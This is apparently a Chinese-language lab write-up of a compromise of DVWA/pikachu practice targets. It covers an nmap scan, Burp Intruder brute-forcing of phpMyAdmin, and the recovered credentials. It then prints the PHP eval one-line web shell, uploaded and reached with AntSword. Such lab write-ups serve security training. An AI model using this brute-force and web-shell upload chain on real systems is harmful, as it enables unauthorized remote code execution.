从DVWA和pikachu上获得getshell
文章目录
nmap扫描
nmap -sV -O -A -T4 192.168.1.9
可以看到扫描结果中有3个端口是打开的,分别为22、25、80端口,并且可以看到目标主机用的是Linux系统
用御剑后台进行扫描
目标靶机地址
192.168.1.9
扫描结果如下:
进入登录界面
http://192.168.1.9/phpmyadmin/db_create.php
对账户密码进行暴力破解
打开burp suite对网页信息进行拦截
拦截到的账户密码信息
进入Intruder后,对【有效载荷集】进行设置后,进行暴力破解
暴力破解结果如下:
得到账户和密码
账户:root
密码:123456
方法1 从DVWA上获得getshell进行渗透
登录phpMyAdmin
进入靶场界面
http://192.168.1.9/index.html
登录DVWA界面
原本的账户密码:
账户:admin
密码:password
由于开始登录上面显示的账户密码未成功登录进去
所以我在phpMyAdmin查看DVWA数据库中的账户和密码
账户:admin
密码:7890
MD5码:cdaeb1282d614772beb1e74c192bebda
修改权限为low
上传一句话木马
<?php @eval($_POST["xxb"]);?>
木马文件名为xxb.php
用蚁剑进行连接
http://192.168.1.9/01/hackable/uploads/xxb.php
连接成功后进入界面